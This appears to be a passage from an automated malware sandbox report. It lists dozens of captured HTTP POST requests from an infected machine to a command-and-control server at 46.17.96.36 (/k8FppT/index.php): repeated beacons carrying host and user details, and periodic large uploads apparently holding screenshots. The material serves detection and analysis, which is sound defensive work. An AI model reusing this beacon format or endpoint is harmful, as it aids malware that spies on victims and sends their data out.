              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6bae687b4eb1df836ed8aa51280f2dcdHost: 46.17.96.36Content-Length: 111957Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----22b9bce780ae51346657ff6c50487d5aHost: 46.17.96.36Content-Length: 107598Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3cHost: 46.17.96.36Content-Length: 107128Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 46.17.96.36Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
